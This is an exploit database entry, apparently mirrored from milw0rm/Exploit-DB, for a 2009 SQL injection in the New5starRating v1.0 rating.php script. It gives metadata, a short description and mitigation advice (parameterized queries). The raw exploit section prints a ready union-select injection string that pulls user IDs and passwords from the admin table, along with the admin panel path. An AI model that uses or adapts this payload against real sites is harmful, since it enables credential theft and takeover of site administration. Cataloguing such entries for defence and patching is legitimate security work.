header-logo
Suggest Exploit
vendor:
New5starRating
by:
Bgh7
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: New5starRating
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:maniacomputer:new_5star_rating:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

New5starRating v1.0 (rating.php) Sql Inj. Vuln.

The vulnerability exists in the rating.php script, which allows an attacker to inject arbitrary SQL commands. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable script. This can allow the attacker to gain access to the admin panel by exploiting the SQL injection vulnerability.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Additionally, the application should use parameterized queries to prevent SQL injection.
Source

Exploit-DB raw data:

New5starRating v1.0 (rating.php) Sql Inj. Vuln.
##################
Yazar: Bgh7
Turk Bilisim Gucleri
##################
Download;
http://www.maniacomputer.com/5star_rating/New_5Star.html
Bug-->Sql Inj.
##################
Exp: rating.php?det=-1 union select userid,0,0,userpass from admin
Panel: /admin/
##################
Thanks: milw0rm-->Str0ke

# milw0rm.com [2009-08-24]

Navigation

Suggest Exploit

Services By CQR